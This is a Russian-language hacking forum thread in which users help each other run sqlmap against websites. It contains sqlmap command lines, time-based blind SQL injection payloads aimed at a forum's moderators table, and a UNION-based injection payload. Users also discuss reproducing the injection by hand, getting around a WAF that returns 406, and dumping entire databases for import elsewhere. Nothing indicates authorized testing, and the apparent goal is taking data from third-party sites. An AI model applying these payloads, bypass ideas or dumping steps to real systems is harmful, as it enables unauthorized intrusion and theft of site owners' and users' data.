 |
|

08.12.2016, 18:58
|
|
Познающий
Регистрация: 29.03.2012
Сообщений: 77
Провел на форуме: 14367
Репутация:
0
|
|
Сообщение от t0ma5
↑
--time-sec=10 это таймаут, попробуй
--delay=1 это слип в секундах между запросами
а вообще уровень вербозности побольше сделай
-v 4
и посмотри что сервер отвечает
-----------
судя по payload это time-based
как сам думаешь не вешают сервак твои висящие запросы в базе)? надо было как ошибки появились - попробовать зайти на сайт, доступен ли он
Сообщение от None
C:\sql>python sqlmap.py -r 3.txt -D www -T ibf_moderators --columns --time-sec=10 --random-agent --risk=3 --level=1 --delay=1 -v 3
[16:59:47] [INFO] fetching columns for table 'ibf_moderators' in database 'www'
[16:59:47] [INFO] resumed: 27
[16:59:47] [DEBUG] performed 0 queries in 0.00 seconds
[16:59:47] [INFO] resuming partial value: mi
[16:59:47] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>64,0,10)))))IowG) AND 'gFNg'='gFNg
[16:59:47] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[17:00:34] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>96,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:34] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[17:00:45] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>112,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:46] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[17:00:47] [DEBUG] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request
[17:00:49] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>120,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:50] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>116,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:51] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>114,0,10)))))IowG) AND 'gFNg'='gFNg
Вот, тут тупо копирует и тухнет, если поставить -v 4 тогда тупо все время копируется POST и вся инфа которая лежит в 3.txt. + [17:04:32] [TRAFFIC OUT] HTTP request [#]: итд Сайт конечно же работает, врятли sql запросы могут повесить бд или сам сайт.
|
|
|

08.12.2016, 19:32
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от PoliGroS
↑
Вот, тут тупо копирует и тухнет, если поставить -v 4 тогда тупо все время копируется POST и вся инфа которая лежит в 3.txt. + [17:04:32] [TRAFFIC OUT] HTTP request [#]: итд Сайт конечно же работает, врятли sql запросы могут повесить бд или сам сайт.
вообще там должен быть код ответа сервера и заголовки, хотя может это при -v 5, не помню точно
"врятли sql запросы могут повесить бд или сам сайт" вот не стоит так заблуждаться)))
|
|
|

12.12.2016, 06:13
|
|
Новичок
Регистрация: 11.12.2016
Сообщений: 3
Провел на форуме: 800
Репутация:
0
|
|
Друзья, подскажите плиз, не пойму как использовать Payload из sqlmap для создания sql запросов непосредственно в браузере?
получил я такой вывод в sqlmap:
Payload: id=-3918') UNION ALL SELECT 65,CONCAT(0x71716b7871,0x6248786b594f4d766a4545694 f4b61685547556765656e697254686d7a49424c716c54736a6 f6970,0x717a627a71)#
Инъекция обнаружена, с помощью sqlmap вижу базу, таблицы и колонки (но не все).
Как использовать payload, чтобы увидеть в браузере, что сайт http://test.ru:443/post.php?id=1 подвержен Sql injection?
Пробовал подставлять вместо id=1 значение id=-3918'), ничего не получается, не могу понять принцип, может и правильно делаю но мой запрос WAF блокирует?
В итоге сайт возвращает меня на главную страницу http://test.ru:443
|
|
|

19.12.2016, 17:08
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме: 43449
Репутация:
1
|
|
Код:
[12:47:03] [INFO] resumed: 1
[12:47:03] [INFO] retrieving the length of query output
[12:47:03] [INFO] retrieved: 1
[12:47:08] [INFO] retrieved: 1
[12:47:15] [INFO] retrieving the length of query output
[12:47:15] [INFO] retrieved: 16
[12:47:25] [INFO] retrieved: ________________
[12:47:25] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
ation step in similar cases
[12:47:30] [INFO] retrieved: ????????????????
[12:47:30] [INFO] retrieving the length of query output
[12:47:30] [INFO] retrieved: 2
[12:47:38] [INFO] retrieved: ??
[12:47:38] [INFO] retrieving the length of query output
[12:47:38] [INFO] retrieved: 128
[12:48:27] [INFO] retrieved: ???????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????????????
начинаю дамп вроде все норм потом ошибка [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
ation step in similar cases
и пошли вопросы(в чем может быть проблема?
|
|
|

19.12.2016, 17:13
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от She1ter
↑
Друзья, подскажите плиз, не пойму как использовать Payload из sqlmap для создания sql запросов непосредственно в браузере?
получил я такой вывод в sqlmap:
Payload: id=-3918') UNION ALL SELECT 65,CONCAT(0x71716b7871,0x6248786b594f4d766a4545694 f4b61685547556765656e697254686d7a49424c716c54736a6 f6970,0x717a627a71)#
Инъекция обнаружена, с помощью sqlmap вижу базу, таблицы и колонки (но не все).
Как использовать payload, чтобы увидеть в браузере, что сайт
http://test.ru:443/post.php?id=1
подвержен Sql injection?
Пробовал подставлять вместо id=1 значение id=-3918'), ничего не получается,
не могу понять принцип
, может и правильно делаю но мой запрос WAF блокирует?
В итоге сайт возвращает меня на главную страницу
http://test.ru:443
К коментарии для кого ?
А вы пробовали в бурпе, вывод может быть и в ошибке, например 500. Надо через бурпсмотреть, почему редирект, скорее всего синтекс хромает, или условие не верное. Причин +100400
п.с во всех бедах винить waf , разумно очень.
brown, на скрине не увидел ничего нормального, 406 - Waf
|
|
|

20.12.2016, 16:51
|
|
Новичок
Регистрация: 11.12.2016
Сообщений: 3
Провел на форуме: 800
Репутация:
0
|
|
Burp не пробовал, но разобрался, действительно синтаксис:-(
Id=-1') -- -
Спасибо
|
|
|

20.12.2016, 20:52
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме: 43449
Репутация:
1
|
|
Сообщение от BabaDook
↑
К коментарии для кого ?
А вы пробовали в бурпе, вывод может быть и в ошибке, например 500. Надо через бурпсмотреть, почему редирект, скорее всего синтекс хромает, или условие не верное. Причин +100400
п.с во всех бедах винить waf , разумно очень.
brown
, на скрине не увидел ничего нормального, 406 - Waf
а как обойти?есть темперы под это?
|
|
|

21.12.2016, 08:26
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Подскажите как сдеать дамп в sql файл?
А то csv немножко не то
Может можно как то сделать дамп всей БД в sql файл и импортировать в последствии в phpMyAdmin
|
|
|

21.12.2016, 09:48
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме: 43449
Репутация:
1
|
|
Сообщение от kacergei
↑
Подскажите как сдеать дамп в sql файл?
А то csv немножко не то
Может можно как то сделать дамп всей БД в sql файл и импортировать в последствии в phpMyAdmin
как в sql не знаю но может поможет,--dump-format=HTML
А вообще cvs в xls и xls импортируешь в sql
|
|
|

21.12.2016, 10:04
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Сообщение от brown
↑
как в sql не знаю но может поможет,--dump-format=HTML
А вообще cvs в xls и xls импортируешь в sql
Это понятно, но проблема в том что с csv при дампе не пишется тип колонок int,varchar и т.д.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|